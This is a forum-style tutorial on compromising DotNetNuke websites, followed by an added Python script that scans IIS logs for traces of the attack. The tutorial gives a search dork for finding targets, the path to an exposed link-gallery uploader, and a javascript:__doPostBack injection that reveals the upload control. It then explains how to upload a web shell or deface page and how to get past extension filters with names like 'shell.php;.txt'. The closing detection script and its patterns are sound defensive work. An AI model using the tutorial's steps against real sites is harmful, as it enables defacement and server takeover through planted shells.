DNN hacking
Now here is another website hacking tutorial! But this one is far more advanced than the previous one!
DNN is DotNetNuke, which is a CMS for building websites!
Q) What is this hack about?
A) Well there is a security hole in DNN which allows any attacker to upload data to the server. This way you can upload a shell to the server.
Steps:
1) Google dork for vulnerable websites: inurl:/tabid/36/language/en-US/Default.aspx
2) After searching the above dork in Google you will come across many sites; open any one you like.
3) You will see /Home/tabid/36/Language/en-US/Default.aspx in the URL.
4) Just replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
5) Now you will see a page titled *LINK GALLERY* having some upload options.
6) Now choose the option File.
7) Then inject the following JavaScript code in the browser address bar: javascript:__doPostBack('ctlURL$cmdUpload','')
Explanation for ctlURL$cmdUpload: ctlURL is the URL control function, which opens the cmdUpload option, which allows an attacker to upload a file.
Sometimes the browser removes *javascript* from this command while copy-pasting, so after pasting the command in the browser just check whether *javascript* is still written there. If it is not there, write *javascript* before :__doPostBack('ctlURL$cmdUpload','')
So the command should always look like:
javascript:__doPostBack('ctlURL$cmdUpload','')
Now the "Choose file" option will come up.
9) Now choose the file, select root, and click on "upload selected file"; upload any HTML deface page or any shell.
10) Now you can view your file/shell at portals/0/uploadedfile.fileformat
11) Additional step: Sometimes the website admin changes the upload permissions and sets a filter on the uploader so that you can only upload .jpeg/.jpg/.txt files.
To bypass this filter just rename the shell to
shell.php;.txt
shell.php;.jpg
or any other extension which is allowed.
This way, when you request the page/shell in the browser, it will be read only up to .php; the .txt will not be read, as the ";" sign ends the request.
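For anyone running a DNN site, the requests described in these steps leave recognizable entries in the IIS access log. The following is an added example, not part of the original tutorial: it scans IIS W3C extended logs for requests to the link gallery page from step 4 and for file names under /Portals/ in which an extension is followed by ";" as in step 11. The sample log lines, client addresses and finding tag names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path from step 4 of the tutorial; compared case-insensitively (IIS paths are).
GALLERY = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
# An extension immediately followed by ';' inside a file name, e.g. "x.php;.txt".
EXT_THEN_SEMICOLON = re.compile(r"\.[a-z0-9]+;")

# Constructed sample in IIS W3C extended log format (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-10 09:14:02 GET /Home/tabid/36/Language/en-US/Default.aspx - 198.51.100.7 200
2024-01-10 09:14:31 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2024-01-10 09:15:10 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2024-01-10 09:15:44 GET /Portals/0/shell.php%3B.txt - 198.51.100.7 200
2024-01-10 09:20:00 GET /Portals/0/logo.jpg - 203.0.113.9 200
"""


def classify(method, uri_stem):
    """Return a finding tag for one request, or None if it is unremarkable."""
    path = unquote(uri_stem).lower()
    if path == GALLERY:
        # __doPostBack submits the page's form, so the upload shows up as a POST.
        return "link-gallery-postback" if method.upper() == "POST" else "link-gallery-request"
    if path.startswith("/portals/"):
        file_name = path.rsplit("/", 1)[-1]
        if EXT_THEN_SEMICOLON.search(file_name):
            return "semicolon-filename"
    return None


def scan(log_text):
    """Parse W3C log text using its #Fields header; return (client, tag, uri) tuples."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can change mid-file
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            tag = classify(row.get("cs-method", ""), row.get("cs-uri-stem", ""))
            if tag:
                findings.append((row.get("c-ip"), tag, row.get("cs-uri-stem")))
    return findings


if __name__ == "__main__":
    for client, tag, uri in scan(SAMPLE_LOG):
        print(f"{client}  {tag:22}  {uri}")
```

A GET to the gallery page followed by a POST from the same client, then a request for a semicolon-named file under /Portals/, is the sequence worth alerting on.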